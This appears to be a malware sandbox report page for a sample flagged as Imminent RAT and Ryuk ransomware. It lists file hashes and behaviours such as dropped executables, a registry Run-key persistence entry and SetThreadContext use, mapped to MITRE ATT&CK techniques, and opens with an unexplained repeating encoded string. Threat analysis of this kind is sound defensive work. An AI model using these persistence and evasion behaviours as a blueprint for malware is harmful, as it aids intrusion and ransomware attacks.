b+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2

Targets

- Target
  
  ce77093b54c13fbcfc399fdb3b61f13f9ab463a38f87428cf9239c53fc6c2017
- Size
  
  32.2MB
- MD5
  
  5aab976003bd9fd656efa03cdbb9c3da
- SHA1
  
  8535ea53061cfb86467c0dfc4cb9afc56ba9a828
- SHA256
  
  ce77093b54c13fbcfc399fdb3b61f13f9ab463a38f87428cf9239c53fc6c2017
- SHA512
  
  b7660b61302c06bca58b4b003d5af13c7bffab3278c5918c2968ba8982c541446f33187579a90ec764d67c4018576467b560df6b9ebe59589a41b40463d85265
Score

10^/10

imminent ryuk persistence ransomware spyware trojan
- Imminent RAT
  Remote-access trojan based on Imminent Monitor remote admin software.
  trojan spyware imminent
- Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.
  ransomware ryuk
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
  persistence
- Suspicious use of SetThreadContext
behavioral1 behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks

Sharing

General

Malware Config

Extracted

Targets

Imminent RAT

Ryuk

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious use of SetThreadContext

MITRE ATT&CK Matrix ATT&CK v6

Tasks

static1

behavioral1

behavioral2